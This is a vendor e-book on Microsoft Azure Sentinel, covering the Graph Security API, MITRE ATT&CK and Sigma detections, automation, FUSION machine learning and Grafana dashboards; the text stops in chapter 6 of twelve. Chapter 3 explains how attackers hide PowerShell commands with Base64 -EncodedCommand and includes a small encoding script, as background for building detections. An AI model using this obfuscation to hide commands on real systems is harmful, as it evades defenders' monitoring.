E-book Azure Sentinel Cloud-native security: a comprehensive overview on Microsoft’s cloud SIEM

Wortell Enterprise Security Maarten Goet of Contents.

1. Not your daddy’s Splunk...... 3 2. Graph Security API...... 11 3. MITRE ATT&CK and Sigma...... 19 4. Automating Azure Sentinel...... 27 5. Machine Learning...... 31 6. Dashboarding...... 40 7. Investigation...... 49 8. Threat hunting in the cloud...... 56 9. Malware analysis...... 63 10. Design Considerations...... 69 11. Access and authorization...... 82 12. Putting it all together...... 90 Use Case 1: Detect DNS tunneling...... 90 Use Case 2: Detect CVE-2019-0708 aka BlueKeep...... 99 Use Case 3: Detect CurveBall...... 108 3 1. Not your daddy’s Splunk. 1. Not your daddy’s

Splunk. 4

OK, I must admit; this title of this chapter is misleading. I am not going to do a side by side comparison of Splunk and Azure Sentinel. Although that seems to be the thing that people on social media are talking about these days: how does Azure Sentinel compare to other SIEM solutions such as Splunk, etc.

Instead, I’ll be focusing on what role Azure Sentinel plays in securing your enterprise. And while Azure Sentinel does provide the advanced SIEM capabilities and dashboarding that many companies need, I really want you to understand the broader picture as Azure Sentinel, as a cloud security solution, is set to disrupt the SOC.

And with Microsoft owning and operating a big part of the technology you use every day in your workplace, along with making security a strategic investment and bet, I argue that they are becoming the biggest security company in the world.

1.1 Biggest security company in the world Microsoft is investing heavily in security in recent years. Not only have they upped their game in finding and fixing product defects, they for instance also have a big organi- zational unit around threat intelligence (Microsoft Threat Intelligence Center). They are investing tens if not hundreds of millions in developing security products and solutions for their platforms. 5

And while one could argue that the early days of their AV solution were not watertight, they certainly turned around that “ship”, and Microsoft should not be underestimated if they are taking security seriously. If you look at their evolved EDR solution today, Windows Defender is not only achiev- ing high scores, it also detects bad actors in ways and speed other vendors do not and cannot.

Because Microsoft’s owns both one of the two biggest cloud platforms in the world, as well as sell the most used cloud endpoint (Windows), they are poised to become the biggest security player in the world. On top of this, it can leverage its immense computing power to use machines learning and artificial intelligence to really make a difference in how security is approached.

You see this coming to life when you connect Microsoft De- fender to their Azure cloud; you start to receive threat intel- ligence feeds, and new malware is detected and remediated through machine learning in under 14 minutes (the example of Bad Rabbit malware). This is why Defender ATP is growing very strong in adoption at enterprises in recent months.

1.2 Traditional SIEM’s and the cloud: a sour-sweet combination By now, you know that Microsoft has an EDR solution called Microsoft Defender. But it has many more offerings. For instance, they also have specific solutions for protection your 6 valuable data such as Cloud App Security and Office 365 ATP. They can protect your identity with Azure AD, and Azure ATP. Microsoft also has Azure Security Center to protect the assets that run on , and there are many more security solutions in their portfolio.

One thing that seemed to be lacking was a central orches- trator. A coordinator for all your security efforts. Something that ties this all together.

In the past years, enterprises would hook up the alerts that Microsoft security solutions were generating and forward them back to their on-premise SIEM solution as part of their cloud security strategy. But they are struggling to keep pace with the increasing volume and variety of data they process. Unhappy users complained about the inability of their SIEMs to scale and the volume of alerts they must investigate.

Enterprises struggling with the cost of data analysis and log storage often turn to open source tools like Elasticsearch, Logstash, and Kibana (ELK) or Hadoop to build their own on-premise data lakes. However, to gain useful insight from the data they collect, they realize the expense of building and administering these “free” tools is just as great as the cost of commercial tools.

1.3 Sentinel, orchestrating your security efforts This is where Azure Sentinel comes in; a central place to analyze your security data, across all parts of your environ- ment. Cloud security solutions like Azure Sentinel are set to disrupt the SOC, Forrester concluded during RSA conference in 2019: “This week, as thousands of security pros gather in San Francisco for RSA, tech titans Microsoft and Google (Alphabet) launch cyber security tools that promise to disrupt the traditional way of taking in and analyzing security telemetry. Chronicle Backstory (an Alphabet company) and Microsoft Sentinel are cloud-based security analytics tools that are 7 addressing the challenges faced by SOC teams such as:

° Ingesting security data from multi-cloud and on-premise environments ° Analyzing large data volumes ° Alert triage ° Log management and storage ° Threat hunting

Chronicle and Microsoft are making these challenges cloud native with virtually unlimited compute, scale, and storage. These vendors have a unique advantage over legacy on-premise tools since they also own their cloud infrastructures and aren’t dependent on buying cloud at list price from would-be competitors.”

1.4 Connecting any and all clouds One could lead to think that this will be an all-Microsoft centered approach. But nothing is truer. While Microsoft has not confirmed this publicly, they are indeed working with other cloud vendors to get their security data programmatically. If you take a look at the Data Connections section of Azure Sentinel, you see a connector for AWS CloudTrail.

8

1.5 The Graph Security API is at the center of this all In another chapter I’ll wrote in more detail about the Graph Security API, but here is a summary:

“Microsoft describes ISG as a way to ‘build solutions that correlate alerts, get context for investigation, and automate security operations in a unified manner.”

With the release of Azure Sentinel, it really amplifies that strategy and makes it come to life. The Graph Security API is a core piece of Sentinel’s backend to grab the relevant information from other Microsoft services such as Azure ATP, Defender ATP, Azure Security Center, etcetera.

But not only for Microsoft services. Many vendors such as Palo Alto Networks, F5, Symantec, Fortinet and Check Point integrated their solutions into the Graph Security API. Azure Sentinel leverages those technical integrations to get events from the network.

Using the dashboards technology already available in Azure, Sentinel is able to provide you with a single pane of glass on the security of your environment. And because of the graph, it provides detailed out of the box drill-down dashboards for those network vendors, as part of your investigation.

9

1.6 Azure Firewall is the perfect example But it doesn’t stop at getting even data from the network. Microsoft released a capability in its own Azure Firewall: Threat intelligence-based filtering.

“Azure firewall can now be configured to alert and deny traffic to and from known malicious IP addresses and domains in near real-time. The IP addresses and domains are sourced from the Microsoft Threat Intelligence feed powered by The Microsoft Intelligent Security Graph.”

Threat intelligence-based filtering is default-­ enabled in alert mode for all Azure Firewall deployments, providing logging of all matching indicators. Customers can adjust behavior to alert and deny.

1.7 Democratizing AI: meet Azure Sentinel FUSION Azure Sentinel features something Microsoft calls FUSION. As Microsoft is looking to democratize Artificial Intelligence, they are making it easy to use machine learning as part of your triage. 10

Instead of sifting through a sea of alerts, and correlate alerts from different products manually, ML technologies will help you quickly get value from large amounts of security data you are ingesting and connect the dots for you.

For example, you can quickly see a compromised account that was used to deploy ransomware in a cloud application. This helps reduce noise drastically. In another chapter you can read more about FUSION.

1.8 Security company I agree totally with Joseph Blankenship:

“For security pros that have been around awhile, don’t let your cynicism block the potential advantages your organization could experience by making use of Azure Sentinel. Take off the tinfoil hat and realize that Microsoft is a security company now. What Google and Microsoft have introduced will make the entire industry better, and that’s something to applaud.

The future of cybersecurity, just like the IT resources it protects, is in the cloud. The Tech Titans are staking out a claim and changing the way security solutions are purchased, delivered, and consumed and it couldn’t come at a better time for the industry.” 11 2. Graph Security API. 2. Graph Security

API. 12

The dictionary defines a graph as:“a diagram representing a system of connections or interrelations among two or more things by a number of distinctive dots, lines, bars, etc.”. In the context of security, John Lambert (Microsoft’s head of Threat Intelligence Center) describes it as:

The graph in your network is the set of security dependencies that create equivalence classes among your assets.

“The design of your network, the management of your network, the software and services used on your network, and the behavior of users on your network all influence this graph. Take a domain controller for example. Bob admins the DC from a workstation. If that workstation is not protected as much as the domain controller, the DC can be compromised.

Any other account that is an admin on Bob’s workstation can compromise Bob and the DC. Every one of those admins logs on to one or more other machines in the natural course of business. If attackers compromise any of them, they have a path to compromise the DC.”

A great example of a Graph that unveils what the ‘short- est path to Domain Admins’ is in Active Directory, is project Bloodhound. A free open-source project created by the specialists of SpecterOps.

2.1 Project Oslo Almost a decade ago Microsoft started working on what was codenamed Project “Oslo”. The core focus was to deliver on a social and collaborative working application for the Office products to transform the way people work. To power “Oslo”, Microsoft was developing API’s for Office that would expose the required data programmatically. In early 2014, at its SharePoint conference, Microsoft announced “Oslo” as Office Delve, and the API’s as Office Graph. 13

The Office Graph has been extensively used by Office 365 and other Microsoft properties, but has also built a large developer community. Many companies are using the API’s nowadays as the primary integration point for their app development.

2.2 Why does this matter to me? John Lambert clearly describes the need for a graph- based defender mindset:

“A lot of network defense goes wrong before any contact with an adversary, starting with how defenders conceive of the battlefield. Most defenders focus on protecting their assets, prioritizing them, and sorting them by workload and business func- tion. Defenders are awash in lists of assets — in system management services, in asset inventory data- bases, in BCDR spreadsheets.

John Lambert Microsoft’s head of Threat Intelligence Center There’s one problem with all of this. Defenders don’t have a list of assets — they have a graph. Assets are connected to each other by security relationships. Attackers breach a network by landing somewhere in the graph using a technique such as spear phishing and they hack, finding vulnerable systems by navigating the graph.” 14

“Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.”

2.3 Security Graph API Early 2018, during Microsoft’s developer conference Build, program manager Sarah Fender announced a preview of what Microsoft would be calling the Graph Security API. This is how she describes it:

“The Graph Security API can be defined as an intermediary service (or broker) that provides a single programmatic interface to connect multiple security providers. Requests to the graph are federated to all applicable providers. The results are aggregated and returned to the requesting application in a common schema.”

This new security-focused API will live alongside the Office Graph.

Later, during Microsoft’s IT Pro focused conference Ignite, the team announced that the Intelligent Security Graph was generally available, and that you could easily access alerts from the following security solutions:

° Azure Active Directory Identity Protection ° Azure Information Protection ° Azure Security Center ° Microsoft Cloud App Security ° Microsoft Intune ° Microsoft Defender ATP

The API also allows you to update the alerts, they can be tagged with additional context or threat intelligence to 15 inform response and remediation, comments and feedback can be captured for visibility to other workflows, and alert status and assignments can be kept in sync.

2.4 Windows 10 & Security Graph work in tandem Since the Windows 10 “1709 release” Microsoft introduced a new feature to the newly renamed Windows Defender Application Control (WDAC): the ability to allow any applications to run that have obtained positive application reputation in Microsoft’s Graph Security API. WDAC now comprises most, but not all, of the functionality that used to fall under the label “Device Guard” pre-1709.

WDAC, when integrated with Graph Security API, could hold the potential to make adoption of application white­ listing much less painful for organizations and individuals by allowing commonly used Windows programs from reputable publishers to run without it being necessary to have specific, per-application or per-publisher rules for them specifically set out in a whitelisting policy.

2.5 PowerShell Because the Graph Security API allows for making HTTPS REST API requests, it’s easy to work with the API with PowerShell. Microsoft published a sample on GitHub. 16 To enable Azure PowerShell to query Azure Resource Graph, the module must be added. This module can be used with locally installed Windows PowerShell and PowerShell Core, or with the Azure PowerShell Docker image.

First step, install the module and authenticate:

° Install the Intelligent Security Graph module from PowerShell Gallery with Install-Module -Name Az.Security ° Connect to your Azure subscription with Connect-AzAccount

Next step, query the API: PRO TIP ° Get all the high severity alerts Use the new Az module through this query: for Azure PowerShell. https://graph.microsoft.com/ This new module is writ- v1.0/security/alerts?$filter= ten from the ground up Severity eq ‘High’get- in .NET Standard. Using AzSecurityAlert | where {$_. .NET Standard allows ReportedSeverity -eq “High”} Azure PowerShell to run under PowerShell 5.x You can also work with the Graph API directly by on Windows or Power- using the graph.microsoft.com endpoint. Note, Shell 6 on any platform, there is a Beta endpoint that surfaces even for instance Linux. The more information about your environment: Az module is now the intended way to inter- ° Get the most recent SecureScore act with Azure through through this query: PowerShell. AzureRM https://graph.microsoft. will continue to get bug com/beta/security/secure- fixes, but no longer scores?$top=1 receive new features. 2.6 Third Parties Many security companies have begun integrating their solutions with the Microsoft Intelligent Security Graph, for instance: 17 ° Lookout adds mobile device security telemetry into the Microsoft Graph for unique threat detection, protection, visibility and control of iOS and Android devices. ° Demisto integrates with Security Graph API to enable alert ingestion across sources, rich and correlated threat context, and automated incident response at scale. ° The Palo Alto Networks provider allows applications to access alerts and contextual information from the Application Framework using the Graph Security API. ° Anomali integrates with the Graph Security API to correlate alerts from Microsoft Graph with threat intelligence, providing earlier detection and response to cyber threats. 18 3. MITRE ATT&CK and Sigma. 3. MITRE ATT&CK

and Sigma. 19

PowerShell has continued to gain in popularity over the past few years as the framework continues to mature, so it’s no surprise we’re seeing it in more attacks. PowerShell offers attackers a wide range of capabilities natively on the system and with a quick look at the landscape of malicious Power- Shell tools flooding out; you have a decent indicator of its growth.

Enter stage left — the PowerShell ‘-EncodedCommand’ parameter. This command intends to take complex strings that may otherwise cause issues for the command-line and wrap them up for PowerShell to execute. By masking the “malicious” part of your command from prying eyes you can avoid strings that may tip-off the defence. MITRE’s ATT&CK framework, Sigma’s open source project and Azure Sentinel can be teamed up to supercharge your defences against these types of attacks. Let’s look at how we can do this.

3.1 Malicious PowerShell usage Quite a number of droppers use these Base64 encod- ed PowerShell commands. For instance, they might try and abuse a Word document through a macro that will try and run cmd.exe which in turn runs PowerShell.exe which then parses an encoded command starting with a $.

Here’s a sample PowerShell script for you to try out encoding some sample command yourself:

$Text = ‘$cmd.exe’$Bytes = [System.Text .Encoding]::Unicode.GetBytes($Text)$EncodedText = [Convert]::ToBase64String($Bytes)$EncodedText 20

3.2 MITRE ATT&CK One of the first things you might ask yourself is how do I know which tactics, techniques and procedures (TTP’s) my adversaries are using? Unless you’ve been involved with research on bad actors and or have been working on the “Red” (offensive) side yourself, you might not have all the information available on what people are using to attack you.

This is why the InfoSec community is about sharing informa- tion. Each might have a piece of the puzzle, and putting them together will provide all of us with the bigger picture, and will allow us to up our defenses in a bigger way. There are numer- ous conferences, blogs and other ways to get those learnings, but the MITRE ATT&CK project is one well worth mentioning.

What is MITRE? They describe themselves as:

“MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”

It’s a community project where many people with hands-on experience contribute. For instance Christiaan Beek, lead at McAfee, shares his learnings on TTP’s actively with MITRE. 21

The information MITRE ATT&CK provides can be consumed in many ways. They provide website which allows you to search the information, there is an ‘attack navigator’ that gives you an interactive way to work with the TTP’s, and there is a programmatic way (API) to retrieve the information as well.

If we query the ATT&CK framework, we find a TTP with number T1086 called “PowerShell”. MITRE provides information about the attack vector, which APT groups typically use it, and infor- mation on which phase of the ‘kill chain’ it maps to: Execution.

Two paragraphs in the TTP information MITRE provides could be of interest to you: Mitigation (how to defend against it) and Detection (monitoring, and possibly hunting):

“[..] If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. [..]”

3.3 Sigma So you’ve learned about the TTP’s that your adversaries might use. But we still need to ‘translate’ this approach to some real detection logic for our SIEM system. We need to provide the query the alert rules will use, and or need to capture the relevant data to use for hunting later on.

Again, if you have been working on the offensive side, you might already have this information readily available. But 22 most defenders will need to investigate the attack vector and come up with a plan as to which data sources to monitor, what to look for, and how the alerting logic would need to be configured.

And if you do find out what to monitor for, you’ll be most likely configuring it directly into your SIEM configuration and maybe not first write down the abstract of what you’re trying to achieve. (This is also the reason that replacing SIEM system is tough; no history of why something is configured there in the first place — but that’s a topic for another blog).

Florian Roth started a community project called Sigma which aims to provide a Generic Signature Format for SIEM systems. The detection logic is written in YAML format, and these .yml files can then be converted or translated into queries or rules for your specific SIEM systems (fi: Azure Sentinel, ArcSight, etc).

“Sigma is for log files what Snort is for network traffic and YARA is for files.”

The Sigma project has fully embraced MITRE’s ATT&CK framework as a way to classify the attack vector. If you look at the rule specification, in the tags section you’ll find fields called “attack.number” and “attack.tactic”. For our PowerShell TTP this would translate to attack.t1086 and attack.execution. 23

On Sigma’s Github repository you’ll find a folder called ‘Rules’ that contain quite a number of Sigma rules that Florian, other members of this project, or the broader community have developed and contributed. Under rules, windows, powershell you’ll find a lot of rules for detecting PowerShell attack vectors.

There are many ‘implementations’ of abusing PowerShell, but the one we were looking for is the one that uses Base64 encoded commands. The Sigma rule definition for this one can be found in the repo under the name posh-encoded- detection.yaml.

3.4 Azure Sentinel Now that we have the Sigma rule, you will want to put that detection logic into your Cloud SIEM, Azure Sentinel. However, we need to take a final step: converting that YAML file into something that Azure Sentinel can read and process.

Guess what, Florian and his team also thought of that! It’s called SIGMAC as in Sigma Converter. In the tools folder of the GitHub repo you will find it as a Python script. The scripts can output to a couple of common SIEM formats, fi: Splunk, Kibana, Arcsight and one that is called “ala”.

The target called ‘ala’ stands for Azure Log PRO TIP 24 Analytics. This is the correct one, as Azure Don’t forget to check Sentinel uses Azure Log Analytics as its back- the basics — am I end as you can read in the Design Consid- collecting the events erations chapter. Choosing ‘ala’ as the target from the security event- in the Sigma Converter will produce the right logs on my Windows KQL query as the result. servers? Is auditing properly enabled and If you want to know more about Event ID 4688 configured in the OS? which this signature uses, you can have a look Are my Microsoft on UltimateWindowsSecurity.com and get Monitoring Agents detailed information. healthy and reporting into Azure Sentinel?

3.5 Use Case Open up Azure Sentinel in the Azure portal and click on ‘Analytics’. Select ‘Add’ to create a new rule. Provide a name, description, severity, and paste in the KQL query. In the Alert Simulation section you’ll see if the query would have triggered.

Now sit back and relax, and wait for the rule to kick in when a malicious Powershell command is run in your environment:

Because you’ve used the Entity Mapping, the alert maps back to the corresponding server, PRO TIP IP address, etcetera, which will assist you in Make sure you select Hunting. Not sure how to do this? Read more the right fields in the details in the chapter on using Jupyter and Entity Mapping section KQL to go Threat Hunting with because you will need Azure Sentinel. this later for Hunting. Then select the alert scheduling and alert suppression parameters, and Save the rule.

25

3.6 Speaking the same language Having a common open framework and taxonomy around TTP’s such as MITRE ATT&CK helps a great deal to organize our defense efforts. Combining that with a generic SIEM format to define the logic needed to detect these TTP’s such as SIGMA is really helpful. Having a community that actively contributes to these SIGMA rules is probably the best thing since sliced bread!

Downloading the alert rules and converting them to be used in Azure Sentinel has never been easier thanks to the community efforts of MITRE and SIGMA. 26 27

4. Automating Azure Sentinel. 4. Automating

Azure Sentinel. 28

Over the past months there has been immense interest in Azure Sentinel. Companies, big and small, are looking at Azure Sentinel for multiple reasons, for instance: burned out for running their own complex SIEM infrastructures, the easy integration with Azure and Office 365 data that Sentinel provides, etc.

The team at Wortell Enterprise Security has been fortunate to assist customers with proof of concepts, pilots, trials and production deployments. Based on this work they’ve built up quite a bit of field experience and felt it was time to contribute back.

Say hello to the open-source PowerShell module called AzSentinel.

4.1 AzSentinel module Late 2019, the team at Wortell Enterprise Security created a PowerShell module called AzSentinel. The goal is to provide programmatic access to Azure Sentinel. One of the first things they wanted to get done is to work with Azure Sentinel ‘rules’.

Rules in Azure Sentinel created the basic logic on which Incidents get created. Currently the only way to add, change or delete rules is through the Azure portal. As many of your are running a cloud Security Operations Center with many customers connected, doing this manually would be no option.

29

4.2 Use Cases The other benefit of having automation is that you can keep the Azure Sentinel instances of your SOC customers synced to a ‘golden repo’. If you’ve defined Use Cases for various situations, you can now push them almost real-time to your customers so that their coverage increases when you find new attack vectors.

This is also why Wortell built support for PRO TIP defining the alert rules in YAML. You can add Are you looking for multiple rule definitions in one configuration sample KQL queries to file as part of your use case. You can find use in your rules and examples in the final chapter. use cases? Wortell has converted a couple of popular Sigma rules and published some of their own KQL queries in this repo: https://github. com/wortell/KQL 30

4.3 Working with the module The module itself requires PowerShell Core 6 or above, the Az module to be installed, and the powershell-yaml module because we’ll be working with YAML files as input. Other than that you just need an Azure Sentinel instance.

Wortell is providing the module under the MIT license. This basically means you can use it for whatever you like as long as you mention them and keep providing the work under MIT as well. And ofcourse: if you work with Azure Sentinel as well, you’re invited to help with the project.

Here’s the link to the GitHub repo: https://github.com/ wortell/AZSentinel

31

5. Machine Learning. 5. Machine

Learning. 32

With the introductions of Chronicle’s Backstory (Google) and Azure Sentinel, 2019 became the year of the ‘Cloud SIEM’. Why is this important? VisibleRisk summarizes it as:

“because these types of products can flip two decades of “normal” on their head and finally position those who defend our enterprises in a way that they can keep pace with the furious pace of change they face.”

Azure Sentinel leverages the immense compute power of the cloud and sophisticated machine learning models to help defences in the enterprise. Microsoft calls this Azure Sentinel FUSION.

5.1 Azure Sentinel FUSION? Say what? If you go to the Overview page in Azure Sentinel you’ll see a reference in the bottom right corner a section called: Democratize ML for your SecOps. It says:

“Unlock the power of AI for security professionals by leveraging MS cutting edge research and best practices in ML, regardless of your current investment level in ML.”

5.2 Enabling Fusion There is no UI to enable Fusion, it is enabled by default. However if you have an instance of Azure Sentinel running, you can use Azure Cloud Shell and the ‘az’ command to dis- able (or re-enable) Fusion for your Log Analytics workspace. 33

° Start Azure Cloud Shell: ° Run the following command: az resource update — ids /subscriptions/{Sub- scription Guid}/resourceGroups/{Log analytics resource Group Name}/providers/Microsoft.Oper- ationalInsights/workspaces/{Log analytics work- space Name}/providers/Microsoft.SecurityInsights/ settings/Fusion — api-version 2019–01–01-preview — set properties.IsEnabled=true — subscription “{Subscription Guid}”

5.3 OK, now what? Great question. Fusion looks at alerts coming from dif- ferent sources and tries to find out if there’s a connection between them in order to fuse them into one case with higher confidence.

“Think about having multiple low fidelity alerts that no one had the time to investigate, we tell you if you should investigate them by fusing them into one case.“

Machine Learning in Azure Sentinel is built-in right from the beginning. We have thoughtfully designed the system with ML innovations aimed to make security analysts, security data scientists and engineers productive. One such innovation is Azure Sentinel Fusion built especially to reduce alert fatigue.

Fusion uses graph powered machine learning algorithms to correlate between millions of lower fidelity anomalous activ- ities from different products such as Azure AD Identity Pro- tection, and Microsoft Cloud App Security, to combine them into a manageable number of interesting security cases. 5.4 Unified SecOps Not coincidently, Microsoft announced last year that they are integrating Cloud App Security, Azure ATP and Azure AD identity protection into an unified SecOps experience and portal: 34

“Microsoft has three identity-centric security products offering detection capabilities across on-premise and in the cloud:

° Azure Advanced Threat Protection (Azure ATP) identifies on-premises attacks ° Azure Active Directory Identity Protection (Azure AD Identity Protection) detects and proactively prevents user and sign-in risks to identities in the cloud ° Microsoft Cloud App Security (MCAS) identifies attacks within a cloud session, covering not only Microsoft products but also third-party applications

“We are happy to announce that we have brought these together in a unified SecOps experience, which focuses on identity-based alerts and activities for true hybrid identity threat protection.”

5.5 Based on three pillars So why are all security vendors adding machine learn- ing and artificial intelligence to their solution? Well, first of all: sifting through tons of alerts in a SIEM is not something security analysts love doing. Their skill set can also be 35 better put to work to hunt for bad actors, based on pre- filtered signals.

Secondly, it is well known that security analysts are drown- ing in those alerts and sometimes miss the critical piece to launch to the next step of investigation. In fact, Mark Russ- inovich laid out Microsoft’s strategy dealing with this three years ago.

Ram Shankar, who leads the Azure Sentinel FUSION team, wrote that the ML team behind Azure Sentinel FUSION asked three questions:

1) Why are alerts noisy? 2) How do experienced security analysts deal with this? 3) How can we incorporate domain knowledge into the system?

The ML team came up with these three ideas:

1. Probabilistic Kill Chain Garden variety detections assume static kill chain. Not true — real world attacks are complex and multistage. So, the ML Team modeled the probability of moving to the next step is conditioned not only on previous step but also factors like current asset. 2. Iterative attack simulation A lot of noise looks like legit attacks because detections explore only one line of attack. For every alert, the ML team iteratively simulates multiple lines of attack using random walk style algorithms to evaluate if this attack 36 is truly feasible.

3. Encode domain knowledge as priors! Incorporating Bayesian methods to tap into expert’s domain knowledge is painfully obvious but the common hurdle inference style algorithms are slow. Not a problem because Azure Sentinel is a cloud based SIEM and the ML team can leverage the cloud’s scalable compute.

These three ideas form the bedrock of Fusion, that Ram claims has shown to reduce alert fatigue by 90%.

5.6 In cybersecurity, it’s AI vs. AI Paul Gillin of SiliconAngle wrote:

“Artificial intelligence research group OpenAI last month made the unusual announcement: It had built an AI-powered content creation engine so sophisticated that it wouldn’t release the full model to developers.

Anyone who works in cybersecurity immediately knew why. Phishing emails, which try to trick recipients into clicking malicious links, orig- inated 91 percent of all cyberattacks in 2016, according to a study by Cofense Inc. Combining software bots to scrape personal information from social networks and public databases with such a powerful con- tent generation engine could produce much more persuasive phishing emails that might even mimic a certain person’s writing style, accord- ing to Nicolas Kseib, lead data scientist at TruSTAR Technology Inc.

The potential result: cybercriminals could launch phishing attacks much faster and on an unprecedented scale.”

AI is a new weapon that some people believe could finally give security professionals a leg up on their adversaries. 5.7 Azure Sentinel FUSION in action Going into the Analytics section of Azure Sentinel you’ll find a rule called ‘Advanced Multistage Attack Detection’. It has the following description: 37 By using Fusion technology that’s based on machine learning, Azure Sentinel can automatically detect multistage attacks by combining anomalous behaviors and suspicious activities that are observed at various stages of the kill-chain. Azure Sentinel then generates incidents that would otherwise be very difficult to catch.

By design, these incidents are low volume, high fidelity, and high severity. This is also why this detection is turned ON by default in Azure Sentinel. It will literally be the first Active Rule that will be in your new Azure Sentinel environment — making the machine learning promise real.

5.8 What does it exactly detect? The question I get most is: “but what does it exactly detect?”. The detections can be categorized in the following buckets:

° Impossible travel to atypical location followed by anomalous Office 365 activity ° Sign-in activity for unfamiliar location followed by anomalous Office 365 activity ° Sign-in activity from infected device followed by anomalous Office 365 activity ° Sign-in activity from anonymous IP address followed by anomalous Office 365 activity ° Sign-in activity from user with leaked credentials followed by anomalous Office 365 activity

Here’s a specific example of a detection where the machine learning model would trigger on: An alert gets raised that is an indication of a sign-in event by from an anonymous proxy IP address , followed by a suspicious inbox forwarding rule was set on a user’s inbox. This may indicate that the account is compromised, and that the mailbox is being used to exfiltrate information from your organization. 38 The user created or updated an inbox forwarding rule that forwards all incoming email to the external address shortly after.

5.9 Connectors To get the machine learning model to work, it needs to be fed with the ‘right’ data. PRO TIP In the case of the ‘advanced multistage Make sure that you detection’ model it needs data from both have the Azure Active Azure Active Directory Identity Protection Directory Identity and Microsoft Cloud App Security. Protection and Microsoft Cloud App Security connectors enabled!

5.10 MITRE ATT&CK The MITRE ATT&CK framework is a comprehensive matrix of tactics and techniques used by threat hunters, red teamers, and defenders to better classify attacks and assess an organization’s risk. You can read more about it in another chapter.

Azure Sentinel and many other security products have adopted this framework and map alerts to the tactics and 39 TTP’s of MITRE. The activities that the ‘advanced multistage detection’ machine learning model will detect, map to TTP’s in the following MITRE tactics:

° Persistence ° Lateral Movement ° Exfiltration ° Command and Control

5.11 What’s next While having real machine learning models in Azure Sentinel already helps up your defenses significantly, Micro- soft is working on bring-your-own-ML functionality for Azure Sentinel. It’s currently in private preview, expected to release early 2020. It allows you to bring your own machine learning model to the party using Azure Databricks.

Even more powerful is a third option that Microsoft is pur- suing: extending the existing models that you get in the box. A sort of hybrid between developing your own from scratch, and just using what is there. A great example would be to extend the existing anomalous logons ML model with data from your badge key access system. This could even further reduce false positives by understanding if somebody is physically present at a certain location. 40

6. Dashboarding. 6. Dashboarding.

41

Each day we collect more and more data. Making sure we collect -all- the relevant data is by itself already a daunting task, but the effort is meaningless if we can’t make it actionable. Machine learning, like available in Azure Sentinel FUSION, makes things actionable in an easy way.

However, to support your Security Operations Center (SOC), it helps to visualize and provide a clear picture on the data as it flows in. While Azure Sentinel has out-of-the-box dashboarding capabilities, it also works great with third party solutions.

In this chapter I’ll show you Grafana, and the Log Analytics connector that Microsoft provides for Grafana, to visualize your Azure Sentinel data.

6.1 Dashboarding Dashboarding has been around for a long while in Micro- soft’s security solutions. Already more than ten years ago, in 2009, I presented about Microsoft’s Audit Collection Services (ACS), part of System Center Operations Manager (SCOM), at Teched North America, and how it could help visualize the security status of your environment using dashboards.

Now that organizations are moving from SCOM to Azure 42 Monitor, they can start using the more advanced dashboard- ing capabilities that Microsoft Azure provides. With the just released AIOps feature Microsoft provides you with so called Dynamic Thresholds.

“Dynamic Thresholds you no longer need to manually identify and set thresholds for alerts. The alert rule leverages advanced machine learning (ML) capabilities to learn metrics’ historical behavior, while identifying patterns and anomalies that indicate possible service issues.”

One thing to understand is that security dashboarding is different from dashboarding in availability and performance management. Here’s what my quote from a recent presenta- tion I did: “Security dashboards are different than IT operations dashboards: security searches for outliers (because those are risky) while in Ops if all goes well you are green (99%).” — Maarten Goet

Therefore, Azure Sentinel provides specific security 43 dashboards out-of-the-box. Some of them are solution focused (Office 365), some are technically focused (Insecure Protocols) and some are geared towards third parties (F5, Palo Alto, etcetera). Technically, these are JSON files that work in the Azure Dashboards section of your portal.

Microsoft regularly updates it (GitHub) repository with new versions of the dashboards as they receive feedback from the field. You can manually update the JSON file in your Tenant or use the built-in functions in the Azure Sentinel UI.

6.2 Grafana Another popular choice to visualize data from Azure Sentinel is to use open source visualization tools. Grafa- na calls itself the open platform for beautiful analytics and monitoring. Grafana is a great option, because it has a large ‘store’ with visualization types (most of them free), and be- cause Microsoft provides you with a native Log Analytics connector for Grafana.

With that connector, you can use Kusto (KQL) queries to get specific data from Azure Sentinel and map it onto one of Grafana’s visualizations. For instance, a world map with net- work connections, or a list of Alerts. Grafana has dashboard- ing features that most SOC’s will love, for instance the rotat- ing dashboards.

Grafana is a very versatile platform and goes beyond just traditional dashboarding. It has features for sending notifi- cations, annotating dashboards, mix & match data sources, and much more. 6.3 What about Kibana? Kibana is another popular open source tool that helps you visualize and understand trends within log data. Kiba- na is the ‘K’ in the ELK stack, the world’s most popular open source log analysis platform, and provides users with a tool 44 for exploring, visualizing, and building dashboards on top of the log data stored in Elasticsearch clusters.

Asaf Yigal summarizes it as follows:

“Kibana’s core feature is data querying and analysis. Using various methods, users can search the data indexed in Elasticsearch for specific events or strings within their data for root cause analysis and diagnostics. Based on these queries, users can use Kibana’s visualization features which allow users to visualize data in a variety of different ways, using charts, tables, geographical maps and other types of visualizations.

The key difference between the two visualization tools stems from their purpose. Grafana is designed for analyzing and visualizing metrics such as system CPU, memory, disk and IO utilization. Grafana does not allow full-text data querying. Kibana, on the other hand, runs on top of Elasticsearch and is used primarily for analyzing log messages.

If you are building a monitoring system, both can do the job well, though there are still some differences that will be outlined below. If it’s logs you’re after, for any of the use cases that logs support — trou- bleshooting, forensics, development, security, Kibana is your option.”

6.4 Easily available from the Azure Marketplace There are a couple of ways to get Grafana. Grafana has their own hosting option called GrafanaCloud which is free for 1 user and 5 dashboards. On their download page you can also find the binaries for Windows, Linux, Mac, and there is even an ARM option. And yes, there is a Docker container.

However, Microsoft’s Azure Marketplace also offers a Grafana image. Just pick a VM size and it will install Ubuntu (latest) together with Grafana (latest). The default port on which Grafana is published is port 3000.

45

6.5 Azure integration out-of-the-box Microsoft has built a Grafana data source for Azure Monitor, Azure Log Analytics and Application Insights. It supports both getting metrics directly from Azure Monitor and/or Azure Application Insights for creating ITOps availability and performance management dashboards.

However, the data source also supports connections to Azure Log Analytics work­ PRO TIP spaces and fetching results from KQL queries. Writing queries in And because Azure Sentinel is based on a Log Grafana is made simple Analytics workspace, the data source can with the familiar Intelli­ work out of the box with security data from Sense auto-complete Azure Sentinel. options you’ve already seen in the Azure Log Analytics query editor. 6.6 The value is in the Plugins One of the strong points of Grafana is the fact that they support plugins. Some are built by Grafana, but there is a strong community out there as well. 46 Some plugins provide you with a ‘panel’, a new way of visual- izing the data, while others are ‘data sources’ allowing you to connect to a new data repository. Grafana also has plugins they call “Apps” that are essentially a bundle of panels, data sources, dashboards and new UI pages.

